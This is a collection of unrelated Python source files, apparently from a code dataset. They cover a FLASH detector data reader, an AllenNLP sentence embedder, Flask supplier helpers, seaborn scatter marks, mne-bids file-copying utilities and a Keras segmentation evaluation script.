def __init__(self, runNumber, config) -> None:
super().__init__(config)
# Set all channels, exluding pulseId as default
self.channels = self.availableChannels
self.runNumber = runNumber
self.index_per_electron = None
self.index_per_pulse = None
self.prq_names = []
self.failed_strings = []
self.dataframes = []
@property
def availableChannels(self) -> list:
"""Returns the channel names that are available for use,
excluding pulseId, defined by the json file"""
available_channels = list(self.all_channels.keys())
available_channels.remove("pulseId")
return available_channels
@property
def channelsPerPulse(self) -> list:
"""Returns a list of channels with per_pulse format,
including all auxillary channels"""
channels_per_pulse = []
for key in self.availableChannels:
if self.all_channels[key]["format"] == "per_pulse":
if key == "dldAux":
for aux_key in self.all_channels[key]["dldAuxChannels"].keys():
channels_per_pulse.append(aux_key)
else:
channels_per_pulse.append(key)
return channels_per_pulse
@property
def channelsPerElectron(self) -> list:
"""Returns a list of channels with per_electron format"""
return [
key
for key in self.availableChannels
if self.all_channels[key]["format"] == "per_electron"
]
@property
def channelsPerTrain(self) -> list:
"""Returns a list of channels with per_train format"""
return [
key
for key in self.availableChannels
if self.all_channels[key]["format"] == "per_train"
]
def resetMultiIndex(self) -> None:
"""Resets the index per pulse and electron"""
self.index_per_electron = None
self.index_per_pulse = None
def createMultiIndexPerElectron(self, h5_file: h5py.File) -> None:
"""Creates an index per electron using pulseId
for usage with the electron resolved pandas dataframe"""
# Macrobunch IDs obtained from the pulseId channel
[train_id, np_array] = self.createNumpyArrayPerChannel(h5_file, "pulseId")
# Create a series with the macrobunches as index and
# microbunches as values
macrobunches = (
Series(
(np_array[i] for i in train_id.index), name="pulseId", index=train_id
) - self.UBID_OFFSET
)
# Explode dataframe to get all microbunch vales per macrobunch,
# remove NaN values and convert to type int
microbunches = macrobunches.explode().dropna().astype(int)
# Create temporary index values
index_temp = MultiIndex.from_arrays(
(microbunches.index, microbunches.values), names=["trainId", "pulseId"]
)
# Calculate the electron counts per pulseId
# unique preserves the order of appearance
electron_counts = index_temp.value_counts()[index_temp.unique()].values
# Series object for indexing with electrons
electrons = Series(
[np.arange(electron_counts[i]) for i in range(electron_counts.size)]
).explode()
# Create a pandas multiindex using the exploded datasets
self.index_per_electron = MultiIndex.from_arrays(
(microbunches.index, microbunches.values, electrons),
names=["trainId", "pulseId", "electronId"],
)
def createMultiIndexPerPulse(self, train_id, np_array) -> None:
"""Creates an index per pulse using a pulse resovled channel's
macrobunch ID, for usage with the pulse resolved pandas dataframe"""
# Create a pandas multiindex, useful to compare electron and
# pulse resolved dataframes
self.index_per_pulse = MultiIndex.from_product(
(train_id, np.arange(0, np_array.shape[1])), names=["trainId", "pulseId"]
)
def createNumpyArrayPerChannel(
self, h5_file: h5py.File, channel: str
) -> tuple[Series, np.ndarray]:
"""Returns a numpy Array for a given channel name for a given file"""
# Get the data from the necessary h5 file and channel
group = cast(h5py.Group, h5_file[self.all_channels[channel]["group_name"]])
channel_dict = self.all_channels[channel] # channel parameters
train_id = Series(group["index"], name="trainId") # macrobunch
# unpacks the timeStamp or value
if channel == "timeStamp":
np_array = cast(h5py.Dataset, group["time"])[()]
else:
np_array = cast(h5py.Dataset, group["value"])[()]
np_array = cast(np.ndarray, np_array)
# Uses predefined axis and slice from the json file
# to choose correct dimension for necessary channel
if "axis" in channel_dict:
np_array = np.take(
np_array, channel_dict["slice"], axis=channel_dict["axis"]
)
return train_id, np_array
def createDataframePerChannel(
self, h5_file: h5py.File, channel: str
) -> Series | DataFrame:
"""Returns a pandas DataFrame for a given channel name for
a given file. The Dataframe contains the MultiIndex and returns
depending on the channel's format"""
[train_id, np_array] = self.createNumpyArrayPerChannel(
h5_file, channel
) # numpy Array created
channel_dict = self.all_channels[channel] # channel parameters
# If np_array is size zero, fill with NaNs
if np_array.size == 0:
np_array = np.full_like(train_id, np.nan, dtype=np.double)
return Series(
(np_array[i] for i in train_id.index), name=channel, index=train_id
)
# Electron resolved data is treated here
if channel_dict["format"] == "per_electron":
# Creates the index_per_electron if it does not
# exist for a given file
if self.index_per_electron is None:
self.createMultiIndexPerElectron(h5_file)
# The microbunch resolved data is exploded and
# converted to dataframe, afterwhich the MultiIndex is set
# The NaN values are dropped, alongside the
# pulseId = 0 (meaningless)
return (
Series((np_array[i] for i in train_id.index), name=channel)
.explode()
.dropna()
.to_frame()
.set_index(self.index_per_electron)
.drop(
index=cast(list[int], np.arange(-self.UBID_OFFSET, 0)),
level=1,
errors="ignore",
)
)
# Pulse resolved data is treated here
elif channel_dict["format"] == "per_pulse":
# Special case for auxillary channels which checks the channel
# dictionary for correct slices and creates a multicolumn
# pandas dataframe
if channel == "dldAux":
# The macrobunch resolved data is repeated 499 times to be
# comapred to electron resolved data for each auxillary channel
# and converted to a multicolumn dataframe
data_frames = (
Series(
(np_array[i, value] for i in train_id.index),
name=key,
index=train_id,
).to_frame()
for key, value in channel_dict["dldAuxChannels"].items()
)
# Multiindex set and combined dataframe returned
return reduce(DataFrame.combine_first, data_frames)
else:
# For all other pulse resolved channels, macrobunch resolved
# data is exploded to a dataframe and the MultiIndex set
# Creates the index_per_pulse for the given channel
self.createMultiIndexPerPulse(train_id, np_array)
return (
Series((np_array[i] for i in train_id.index), name=channel)
.explode()
.to_frame()
.set_index(self.index_per_pulse)
)
elif channel_dict["format"] == "per_train":
return (
Series((np_array[i] for i in train_id.index), name=channel)
.to_frame()
.set_index(train_id)
)
else:
raise ValueError(
channel
+ "has an undefined format. Available formats are \
per_pulse, per_electron and per_train"
)
def concatenateChannels(
self, h5_file: h5py.File, format_: str = ""
) -> Series | DataFrame:
"""Returns a concatenated pandas DataFrame for either all pulse,
train or electron resolved channels."""
# filters for valid channels
valid_names = [
each_name for each_name in self.channels if each_name in self.all_channels
]
# Only channels with the defined format are selected and stored
# in an iterable list
if format_ is not None:
channels = [
each_name
for each_name in valid_names
if self.all_channels[each_name]["format"] == format_
]
else:
channels = [each_name for each_name in valid_names]
# if the defined format has channels, returns a concatenatd Dataframe.
# Otherwise returns empty Dataframe.
if channels:
data_frames = (
self.createDataframePerChannel(h5_file, each) for each in channels
)
return reduce(
lambda left, right: left.join(right, how="outer"), data_frames
)
else:
return DataFrame()
def createDataframePerFile(self, file_path: Path) -> Series | DataFrame:
"""Returns two pandas DataFrames constructed for the given file.
The DataFrames contains the datasets from the iterable in the
order opposite to specified by channel names. One DataFrame is
pulse resolved and the other electron resolved.
"""
# Loads h5 file and creates two dataframes
with h5py.File(file_path, "r") as h5_file:
self.resetMultiIndex() # Reset MultiIndexes for next file
return self.concatenateChannels(h5_file)
def runFilesNames(
self, run_number: int, daq: str, raw_data_dir: Path
) -> list[Path]:
"""Returns all filenames of given run located in directory
for the given daq."""
stream_name_prefixes = {
"pbd": "GMD_DATA_gmd_data",
"pbd2": "FL2PhotDiag_pbd2_gmd_data",
"fl1user1": "FLASH1_USER1_stream_2",
"fl1user2": "FLASH1_USER2_stream_2",
"fl1user3": "FLASH1_USER3_stream_2",
"fl2user1": "FLASH2_USER1_stream_2",
"fl2user2": "FLASH2_USER2_stream_2",
}
return sorted(
Path(raw_data_dir).glob(
f"{stream_name_prefixes[daq]}_run{run_number}_*.h5"
),
key=lambda filename: str(filename).split("_")[-1],
)
def h5ToParquet(self, h5_path: Path, prq_path: str) -> None:
"""Uses the createDataFramePerFile method and saves
the dataframes to a parquet file."""
try:
(
self.createDataframePerFile(h5_path)
.reset_index(level=["trainId", "pulseId", "electronId"])
.to_parquet(prq_path, index=False)
)
except ValueError as failed_string_error:
self.failed_strings.append(f"{prq_path}: {failed_string_error}")
self.prq_names.remove(prq_path)
def fillNA(self) -> None:
"""Routine to fill the NaN values with intrafile forward filling."""
# First use forward filling method to fill each file's
# pulse and train resolved channels.
channels = self.channelsPerPulse + self.channelsPerTrain
for i in range(len(self.dataframes)):
self.dataframes[i][channels] = self.dataframes[i][channels].fillna(
method="ffill"
)
# This loop forward fills between the consective files.
# The first run file will have NaNs, unless another run
# before it has been defined.
for i in range(1, len(self.dataframes)):
# Take only pulse channels
subset = self.dataframes[i][channels]
# Find which column(s) contain NaNs.
is_null = subset.loc[0].isnull().values.compute()
# Statement executed if there is more than one NaN value in the
# first row from all columns
if is_null.sum() > 0:
# Select channel names with only NaNs
channels_to_overwrite = list(compress(channels, is_null[0]))
# Get the values for those channels from previous file
values = self.dataframes[i - 1][channels].tail(1).values[0]
# Fill all NaNs by those values
subset[channels_to_overwrite] = subset[channels_to_overwrite].fillna(
dict(zip(channels_to_overwrite, values))
)
# Overwrite the dataframes with filled dataframes
self.dataframes[i][channels] = subset
def readData(
self, runs: list[int] | int = 0, ignore_missing_runs: bool = False
) -> None:
"""Read express data from DAQ, generating a parquet in between."""
if not runs:
runs = self.runNumber
# create a per_file directory
temp_parquet_dir = self.DATA_PARQUET_DIR.joinpath("per_file")
if not temp_parquet_dir.exists():
os.mkdir(temp_parquet_dir)
# Prepare a list of names for the files to read and parquets to write
try:
runs = cast(list, runs)
runs_str = f"Runs {runs[0]} to {runs[-1]}"
except TypeError:
runs = cast(int, runs)
runs_str = f"Run {runs}"
runs = [runs]
parquet_name = f"{temp_parquet_dir}/"
all_files = []
for run in runs:
files = self.runFilesNames(cast(int, run), self.DAQ, self.DATA_RAW_DIR)
for file in files:
all_files.append(file)
if len(files) == 0 and not ignore_missing_runs:
raise FileNotFoundError(f"No file found for run {run}")
self.prq_names = [
parquet_name + all_files[i].stem for i in range(len(all_files))
]
missing_files = []
missing_prq_names = []
# only read and write files which were not read already
for i in range(len(self.prq_names)):
if not Path(self.prq_names[i]).exists():
missing_files.append(all_files[i])
missing_prq_names.append(self.prq_names[i])
print(
(f"Reading {runs_str}: {len(missing_files)} new files of "
f"{len(all_files)} total.")
)
self.failed_strings = []
self.resetMultiIndex() # initializes the indices for h5ToParquet
# Set cores for multiprocessing
N_CORES = len(missing_files)
if N_CORES > cpu_count() - 1:
N_CORES = cpu_count() - 1
# Read missing files using multiple cores
if len(missing_files) > 0:
with Pool(processes=N_CORES) as pool:
pool.starmap(
self.h5ToParquet, tuple(zip(missing_files, missing_prq_names))
)
if len(self.failed_strings) > 0:
print(
(f"Failed reading {len(self.failed_strings)}"
f"files of{len(all_files)}:")
)
for failed_string in self.failed_strings:
print(f"\t- {failed_string}")
if len(self.prq_names) == 0:
raise ValueError(
"No data available. Probably failed reading all h5 files"
)
print(
(f"Loading {len(self.prq_names)} dataframes. Failed reading "
f"{len(all_files)-len(self.prq_names)} files.")
)
self.dataframes = [dd.read_parquet(fn) for fn in self.prq_names]
self.fillNA()
dataframe = cast(dd.DataFrame, dd.concat(self.dataframes))
df_electron = dataframe.dropna(subset=self.channelsPerElectron)
pulse_columns = (
["trainId", "pulseId", "electronId"]
+ self.channelsPerPulse
+ self.channelsPerTrain
)
df_pulse = dataframe[pulse_columns]
df_pulse = df_pulse[
(df_pulse["electronId"] == 0) | (np.isnan(df_pulse["electronId"]))
]
self.dd = df_electron.repartition(npartitions=len(self.prq_names))
|
StarcoderdataPython
|
4903951
|
import codecs
from collections import defaultdict
import torch
from allennlp.common import Params
from allennlp.data import Vocabulary
from allennlp.modules.token_embedders.token_embedder import TokenEmbedder
@TokenEmbedder.register("sentence_embedding")
class SentenceEmbedding(TokenEmbedder):
"""
Embedder for contextual embeddings. which reads a file of the format 'sentence TAB index TAB vector'.
"""
def read_file(self, path):
self.embs = defaultdict(lambda: defaultdict())
with codecs.open(path, encoding='utf-8') as f:
for line in f:
# Read sentence, index and word vector
sp = line.split("\t")
vector_str = sp[2]
vector = []
for n in vector_str.split(" "):
try:
vector.append(float(n))
except ValueError:
break
index = int(sp[1])
sentence = sp[0]
# Save vector in a dict
self.embs[sentence][index] = vector
def get_output_dim(self) -> int:
return self.output_dim
def forward(self, # pylint: disable=arguments-differ
inputs: torch.Tensor,
word_inputs: torch.Tensor = None) -> torch.Tensor:
"""
:param inputs: list of sentences (sentence = list of token indices)
:param word_inputs: not used
:return: tensor which contains a list of embedded sentences (every sentence is a list of word vectors)
"""
if self.output_dim is None or self.output_dim == 0:
raise NotImplementedError
# Get tokens from token indices
max_sentences_length = len(inputs[0].tolist())
sentences = []
for i in inputs:
token_list = []
for j in i:
if j.item() != 0:
token = self.vocab.get_token_from_index(j.item())
token_list += [token]
sentences += [token_list]
sentence_emb = []
# Read the embeddings from the dict
for sentence_list in sentences:
sentence = " ".join(sentence_list[0:-1])
index = int(sentence_list[-1])
try:
word_embedding = self.embs[sentence][index]
except KeyError:
print("KEY ERROR " + sentence + " INDEX " + str(index))
word_embedding = [0] * self.output_dim
vector_list = []
# Add zeros to the returning tensor for all tokens without vectors. AllenNLP wants an embedding for every token
if index != 0:
for i in range(0, index):
vector_list += [[0] * self.output_dim]
vector_list += [word_embedding]
for i in range(0, max_sentences_length - index - 1):
vector_list += [[0] * self.output_dim]
sentence_emb += [vector_list]
# Create tensor
device = inputs.device
# print(sentence_emb)
tensor = torch.tensor(sentence_emb, device=device)
return tensor
@classmethod
def from_params(cls, vocab: Vocabulary, params: Params) -> 'SentenceEmbedding':
cls.vocab = vocab
embedding_dim = params["embedding_dim"]
pretrained_file = params["pretrained_vector_file"]
return cls(pretrained_file, embedding_dim)
def __init__(self, file, vector_size) -> None:
super().__init__()
self.embs = {}
self.output_dim = vector_size
self.read_file(file)
|
StarcoderdataPython
|
214253
|
<gh_stars>0
import re
from datetime import datetime
from flask import abort, current_app
from flask_login import current_user
from dmapiclient import APIError
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
def get_drafts(apiclient, framework_slug):
try:
drafts = apiclient.find_draft_services(
current_user.supplier_code,
framework=framework_slug
)['services']
except APIError as e:
abort(e.status_code)
complete_drafts = [draft for draft in drafts if draft['status'] == 'submitted']
drafts = [draft for draft in drafts if draft['status'] == 'not-submitted']
return drafts, complete_drafts
def get_lot_drafts(apiclient, framework_slug, lot_slug):
drafts, complete_drafts = get_drafts(apiclient, framework_slug)
return (
[draft for draft in drafts if draft['lotSlug'] == lot_slug],
[draft for draft in complete_drafts if draft['lotSlug'] == lot_slug]
)
def count_unanswered_questions(service_attributes):
unanswered_required, unanswered_optional = (0, 0)
for section in service_attributes:
for question in section.questions:
if question.answer_required:
unanswered_required += 1
elif question.value in ['', [], None]:
unanswered_optional += 1
return unanswered_required, unanswered_optional
def is_service_associated_with_supplier(service):
return service.get('supplierCode') == current_user.supplier_code
def get_signed_document_url(uploader, document_path):
url = uploader.get_signed_url(document_path)
if url is not None:
url = urlparse.urlparse(url)
base_url = urlparse.urlparse(current_app.config['DM_ASSETS_URL'])
return url._replace(netloc=base_url.netloc, scheme=base_url.scheme).geturl()
def parse_document_upload_time(data):
match = re.search(r"(\d{4}-\d{2}-\d{2}-\d{2}\d{2})\..{2,3}$", data)
if match:
return datetime.strptime(match.group(1), "%Y-%m-%d-%H%M")
def get_next_section_name(content, current_section_id):
if content.get_next_editable_section_id(current_section_id):
return content.get_section(
content.get_next_editable_section_id(current_section_id)
).name
|
StarcoderdataPython
|
1857354
|
from __future__ import annotations
from dataclasses import dataclass
import numpy as np
import matplotlib as mpl
from seaborn._marks.base import (
Mark,
Mappable,
MappableBool,
MappableFloat,
MappableString,
MappableColor,
MappableStyle,
resolve_properties,
resolve_color,
)
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Any
from matplotlib.artist import Artist
from seaborn._core.scales import Scale
@dataclass
class Scatter(Mark):
"""
A point mark defined by strokes with optional fills.
"""
# TODO retype marker as MappableMarker
marker: MappableString = Mappable(rc="scatter.marker", grouping=False)
stroke: MappableFloat = Mappable(.75, grouping=False) # TODO rcParam?
pointsize: MappableFloat = Mappable(3, grouping=False) # TODO rcParam?
color: MappableColor = Mappable("C0", grouping=False)
alpha: MappableFloat = Mappable(1, grouping=False) # TODO auto alpha?
fill: MappableBool = Mappable(True, grouping=False)
fillcolor: MappableColor = Mappable(depend="color", grouping=False)
fillalpha: MappableFloat = Mappable(.2, grouping=False)
def _resolve_paths(self, data):
paths = []
path_cache = {}
marker = data["marker"]
def get_transformed_path(m):
return m.get_path().transformed(m.get_transform())
if isinstance(marker, mpl.markers.MarkerStyle):
return get_transformed_path(marker)
for m in marker:
if m not in path_cache:
path_cache[m] = get_transformed_path(m)
paths.append(path_cache[m])
return paths
def _resolve_properties(self, data, scales):
resolved = resolve_properties(self, data, scales)
resolved["path"] = self._resolve_paths(resolved)
if isinstance(data, dict): # TODO need a better way to check
filled_marker = resolved["marker"].is_filled()
else:
filled_marker = [m.is_filled() for m in resolved["marker"]]
resolved["linewidth"] = resolved["stroke"]
resolved["fill"] = resolved["fill"] & filled_marker
resolved["size"] = resolved["pointsize"] ** 2
resolved["edgecolor"] = resolve_color(self, data, "", scales)
resolved["facecolor"] = resolve_color(self, data, "fill", scales)
# Because only Dot, and not Scatter, has an edgestyle
resolved.setdefault("edgestyle", (0, None))
fc = resolved["facecolor"]
if isinstance(fc, tuple):
resolved["facecolor"] = fc[0], fc[1], fc[2], fc[3] * resolved["fill"]
else:
fc[:, 3] = fc[:, 3] * resolved["fill"] # TODO Is inplace mod a problem?
resolved["facecolor"] = fc
return resolved
def _plot(self, split_gen, scales, orient):
# TODO Not backcompat with allowed (but nonfunctional) univariate plots
# (That should be solved upstream by defaulting to "" for unset x/y?)
# (Be mindful of xmin/xmax, etc!)
# TODO pass scales *into* split_gen?
for keys, data, ax in split_gen():
offsets = np.column_stack([data["x"], data["y"]])
data = self._resolve_properties(data, scales)
points = mpl.collections.PathCollection(
offsets=offsets,
paths=data["path"],
sizes=data["size"],
facecolors=data["facecolor"],
edgecolors=data["edgecolor"],
linewidths=data["linewidth"],
linestyles=data["edgestyle"],
transOffset=ax.transData,
transform=mpl.transforms.IdentityTransform(),
)
ax.add_collection(points)
def _legend_artist(
self, variables: list[str], value: Any, scales: dict[str, Scale],
) -> Artist:
key = {v: value for v in variables}
res = self._resolve_properties(key, scales)
return mpl.collections.PathCollection(
paths=[res["path"]],
sizes=[res["size"]],
facecolors=[res["facecolor"]],
edgecolors=[res["edgecolor"]],
linewidths=[res["linewidth"]],
linestyles=[res["edgestyle"]],
transform=mpl.transforms.IdentityTransform(),
)
# TODO change this to depend on ScatterBase?
@dataclass
class Dot(Scatter):
"""
A point mark defined by shape with optional edges.
"""
marker: MappableString = Mappable("o", grouping=False)
color: MappableColor = Mappable("C0", grouping=False)
alpha: MappableFloat = Mappable(1, grouping=False)
fill: MappableBool = Mappable(True, grouping=False)
edgecolor: MappableColor = Mappable(depend="color", grouping=False)
edgealpha: MappableFloat = Mappable(depend="alpha", grouping=False)
pointsize: MappableFloat = Mappable(6, grouping=False) # TODO rcParam?
edgewidth: MappableFloat = Mappable(.5, grouping=False) # TODO rcParam?
edgestyle: MappableStyle = Mappable("-", grouping=False)
def _resolve_properties(self, data, scales):
# TODO this is maybe a little hacky, is there a better abstraction?
resolved = super()._resolve_properties(data, scales)
filled = resolved["fill"]
main_stroke = resolved["stroke"]
edge_stroke = resolved["edgewidth"]
resolved["linewidth"] = np.where(filled, edge_stroke, main_stroke)
# Overwrite the colors that the super class set
main_color = resolve_color(self, data, "", scales)
edge_color = resolve_color(self, data, "edge", scales)
if not np.isscalar(filled):
# Expand dims to use in np.where with rgba arrays
filled = filled[:, None]
resolved["edgecolor"] = np.where(filled, edge_color, main_color)
filled = np.squeeze(filled)
if isinstance(main_color, tuple):
main_color = tuple([*main_color[:3], main_color[3] * filled])
else:
main_color = np.c_[main_color[:, :3], main_color[:, 3] * filled]
resolved["facecolor"] = main_color
return resolved
|
StarcoderdataPython
|
3388311
|
<filename>imperfecto/misc/utils.py
"""
A collection of helper functions and classes.
"""
from enum import Enum
import os
import numpy as np
def run_web(config: dict) -> None:
"""Run the express server.
Args:
config: a dictionary containing the configuration for the express server
"""
command = "node web/server/server.js"
for key, value in config.items():
command += f" --{key}={value}"
print(f">> Running $ {command}")
os.system(command)
class lessVerboseEnum(Enum):
"""
A less verbose version of the Enum class.
Example::
class Test(lessVerboseEnum):
TEST=0
print(Test.TEST) # prints "TEST" instead of "Test.TEST"
"""
def __repr__(self):
return self.name
def __str__(self):
return self.name
def get_action(action_probs: np.ndarray) -> int:
"""
Sample an action from an action probability distribution.
Args:
action_probs: a numpy array of probabilities of length n_actions
Returns:
the index of the action sampled with the given probabilities
"""
action = np.random.choice(np.arange(len(action_probs)), p=action_probs)
return action
|
StarcoderdataPython
|
277141
|
<reponame>SophieHerbst/mne-bids
"""Utility functions to copy raw data files.
When writing BIDS datasets, we often move and/or rename raw data files. several
original data formats have properties that restrict such operations. That is,
moving/renaming raw data files naively might lead to broken files, for example
due to internal pointers that are not being updated.
"""
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
import os
import os.path as op
import re
import shutil as sh
from scipy.io import loadmat, savemat
from mne_bids.read import _parse_ext
def _copytree(src, dst, **kwargs):
"""See: https://github.com/jupyterlab/jupyterlab/pull/5150."""
try:
sh.copytree(src, dst, **kwargs)
except sh.Error as error:
# `copytree` throws an error if copying to + from NFS even though
# the copy is successful (see https://bugs.python.org/issue24564)
if '[Errno 22]' not in str(error) or not op.exists(dst):
raise
def _get_brainvision_encoding(vhdr_file, verbose=False):
"""Get the encoding of .vhdr and .vmrk files.
Parameters
----------
vhdr_file : str
path to the header file
verbose : Bool
determine whether results should be logged.
(default False)
Returns
-------
enc : str
encoding of the .vhdr file to pass it on to open() function
either 'UTF-8' (default) or whatever encoding scheme is specified
in the header
"""
with open(vhdr_file, 'rb') as ef:
enc = ef.read()
if enc.find(b'Codepage=') != -1:
enc = enc[enc.find(b'Codepage=') + 9:]
enc = enc.split()[0]
enc = enc.decode()
src = '(read from header)'
else:
enc = 'UTF-8'
src = '(default)'
if verbose is True:
print('Detected file encoding: %s %s.' % (enc, src))
return enc
def _get_brainvision_paths(vhdr_path):
"""Get the .eeg and .vmrk file paths from a BrainVision header file.
Parameters
----------
vhdr_path : str
path to the header file
Returns
-------
paths : tuple
paths to the .eeg file at index 0 and the .vmrk file
at index 1 of the returned tuple
"""
fname, ext = _parse_ext(vhdr_path)
if ext != '.vhdr':
raise ValueError('Expecting file ending in ".vhdr",'
' but got {}'.format(ext))
# Header file seems fine
# extract encoding from brainvision header file, or default to utf-8
enc = _get_brainvision_encoding(vhdr_path)
# ..and read it
with open(vhdr_path, 'r', encoding=enc) as f:
lines = f.readlines()
# Try to find data file .eeg
eeg_file_match = re.search(r'DataFile=(.*\.eeg)', ' '.join(lines))
if not eeg_file_match:
raise ValueError('Could not find a .eeg file link in'
' {}'.format(vhdr_path))
else:
eeg_file = eeg_file_match.groups()[0]
# Try to find marker file .vmrk
vmrk_file_match = re.search(r'MarkerFile=(.*\.vmrk)', ' '.join(lines))
if not vmrk_file_match:
raise ValueError('Could not find a .vmrk file link in'
' {}'.format(vhdr_path))
else:
vmrk_file = vmrk_file_match.groups()[0]
# Make sure we are dealing with file names as is customary, not paths
# Paths are problematic when copying the files to another system. Instead,
# always use the file name and keep the file triplet in the same directory
assert os.sep not in eeg_file
assert os.sep not in vmrk_file
# Assert the paths exist
head, tail = op.split(vhdr_path)
eeg_file_path = op.join(head, eeg_file)
vmrk_file_path = op.join(head, vmrk_file)
assert op.exists(eeg_file_path)
assert op.exists(vmrk_file_path)
# Return the paths
return (eeg_file_path, vmrk_file_path)
def copyfile_ctf(src, dest):
"""Copy and rename CTF files to a new location.
Parameters
----------
src : str
path to the source raw .ds folder
dest : str
path to the destination of the new bids folder.
"""
_copytree(src, dest)
# list of file types to rename
file_types = ('.acq', '.eeg', '.hc', '.hist', '.infods', '.bak',
'.meg4', '.newds', '.res4')
# Rename files in dest with the name of the dest directory
fnames = [f for f in os.listdir(dest) if f.endswith(file_types)]
bids_folder_name = op.splitext(op.split(dest)[-1])[0]
for fname in fnames:
ext = op.splitext(fname)[-1]
os.rename(op.join(dest, fname),
op.join(dest, bids_folder_name + ext))
def copyfile_brainvision(vhdr_src, vhdr_dest, verbose=False):
"""Copy a BrainVision file triplet to a new location and repair links.
Parameters
----------
vhdr_src, vhdr_dest: str
The src path of the .vhdr file to be copied and the destination
path. The .eeg and .vmrk files associated with the .vhdr file
will be given names as in vhdr_dest with adjusted extensions.
Internal file pointers will be fixed.
"""
# Get extenstion of the brainvision file
fname_src, ext_src = _parse_ext(vhdr_src)
fname_dest, ext_dest = _parse_ext(vhdr_dest)
if ext_src != ext_dest:
raise ValueError('Need to move data with same extension'
' but got "{}", "{}"'.format(ext_src, ext_dest))
eeg_file_path, vmrk_file_path = _get_brainvision_paths(vhdr_src)
# extract encoding from brainvision header file, or default to utf-8
enc = _get_brainvision_encoding(vhdr_src, verbose)
# Copy data .eeg ... no links to repair
sh.copyfile(eeg_file_path, fname_dest + '.eeg')
# Write new header and marker files, fixing the file pointer links
# For that, we need to replace an old "basename" with a new one
# assuming that all .eeg, .vhdr, .vmrk share one basename
__, basename_src = op.split(fname_src)
assert basename_src + '.eeg' == op.split(eeg_file_path)[-1]
assert basename_src + '.vmrk' == op.split(vmrk_file_path)[-1]
__, basename_dest = op.split(fname_dest)
search_lines = ['DataFile=' + basename_src + '.eeg',
'MarkerFile=' + basename_src + '.vmrk']
with open(vhdr_src, 'r', encoding=enc) as fin:
with open(vhdr_dest, 'w', encoding=enc) as fout:
for line in fin.readlines():
if line.strip() in search_lines:
line = line.replace(basename_src, basename_dest)
fout.write(line)
with open(vmrk_file_path, 'r', encoding=enc) as fin:
with open(fname_dest + '.vmrk', 'w', encoding=enc) as fout:
for line in fin.readlines():
if line.strip() in search_lines:
line = line.replace(basename_src, basename_dest)
fout.write(line)
if verbose:
for ext in ['.eeg', '.vhdr', '.vmrk']:
print('Created "{}" in "{}"'
.format(fname_dest + ext,
op.dirname(op.realpath(vhdr_dest))))
def copyfile_eeglab(src, dest):
"""Copy a EEGLAB files to a new location and adjust pointer to '.fdt' file.
Some EEGLAB .set files come with a .fdt binary file that contains the data.
When moving a .set file, we need to check for an associated .fdt file and
move it to an appropriate location as well as update an internal pointer
within the .set file.
Notes
-----
Work in progress. This function will abort upon the encounter of a .fdt
file.
"""
# Get extenstion of the EEGLAB file
fname_src, ext_src = _parse_ext(src)
fname_dest, ext_dest = _parse_ext(dest)
if ext_src != ext_dest:
raise ValueError('Need to move data with same extension'
' but got {}, {}'.format(ext_src, ext_dest))
# Extract matlab struct "EEG" from EEGLAB file
mat = loadmat(src, squeeze_me=False, chars_as_strings=False,
mat_dtype=False, struct_as_record=True)
if 'EEG' not in mat:
raise ValueError('Could not find "EEG" field in {}'.format(src))
eeg = mat['EEG']
# If the data field is a string, it points to a .fdt file in src dir
data = eeg[0][0]['data']
if all([item in data[0, -4:] for item in '.fdt']):
head, tail = op.split(src)
fdt_pointer = ''.join(data.tolist()[0])
fdt_path = op.join(head, fdt_pointer)
fdt_name, fdt_ext = _parse_ext(fdt_path)
if fdt_ext != '.fdt':
raise IOError('Expected extension {} for linked data but found'
' {}'.format('.fdt', fdt_ext))
# Copy the fdt file and give it a new name
sh.copyfile(fdt_path, fname_dest + '.fdt')
# Now adjust the pointer in the set file
head, tail = op.split(fname_dest + '.fdt')
mat['EEG'][0][0]['data'] = tail
savemat(dest, mat, appendmat=False)
# If no .fdt file, simply copy the .set file, no modifications necessary
else:
sh.copyfile(src, dest)
def copyfile_bti(raw, dest):
"""Copy BTi data."""
pdf_fname = 'c,rfDC'
if raw.info['highpass'] is not None:
pdf_fname = 'c,rf%0.1fHz' % raw.info['highpass']
sh.copyfile(raw._init_kwargs['pdf_fname'],
op.join(dest, pdf_fname))
sh.copyfile(raw._init_kwargs['config_fname'],
op.join(dest, 'config'))
sh.copyfile(raw._init_kwargs['head_shape_fname'],
op.join(dest, 'hs_file'))
|
StarcoderdataPython
|
5060372
|
<reponame>DavidLlorens/algoritmia<gh_stars>1-10
from algoritmia.semirings.interfaces import IIdempotentSemiRing
class _FuzzySemiRing(IIdempotentSemiRing):
zero = property(lambda self: 0.0)
one = property(lambda self: 1.0)
def plus(self, left, right): return max(left, right)
def times(self, left, right): return min(left, right)
FuzzySemiRing = _FuzzySemiRing()#]full
|
StarcoderdataPython
|
4842435
|
from modelLib import *
from trainUtils import *
from keras.models import load_model
import customLoss as cl
import metrics as m
import keras
import keras.backend as K
# suprresing tensorflow messages
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
configTF = tf.ConfigProto()
configTF.gpu_options.allow_growth = True
sess = tf.Session(config=configTF)
tf.set_random_seed(1306)
np.random.seed(1306)
# database to use
dbPath = 'P:/dataset3_2d_onlyTumor_cropped_x-74-426_y-74-426_resized_224-224_clipped-0-1800_wavelet_scaled_val.hdf5'
db = h5py.File(dbPath, 'r')
X = db['slice'][...]
X = np.float32(X)
X = np.expand_dims(X, -1)
Y = db['mask'][...]
Y = np.expand_dims(Y, -1)
Y = np.float32(Y)
cases = db['case'][...]
tidx = list(range(0, X.shape[0])) # all
np.random.shuffle(tidx)
X = X[tidx, ...]
Y = Y[tidx, ...]
cases = cases[tidx, ...]
modelDir = '../models' # where models are saved
# models to use ensemble
modelName = ['maskNet002e_001']
# segmentation threshold
segThreshold = 0.2
YP = None
for mn in modelName:
modelFolder = os.path.join(modelDir,mn)
weightsFolder = os.path.join(modelFolder, "weights")
bestModelPath = os.path.join(weightsFolder, "best.hdf5")
model = load_model(bestModelPath,custom_objects={'log_dice_coef_loss': cl.log_dice_coef_loss, 'dice_coef_loss': cl.dice_coef_loss, 'dice_coef':cl.dice_coef})
if YP is None:
YP = model.predict(X, batch_size=50, verbose=1)
else:
YP += model.predict(X, batch_size=50, verbose=1)
K.clear_session()
YP = np.divide(YP, len(modelName))
# YP = unshuffle(YP,tidx)
dc = []
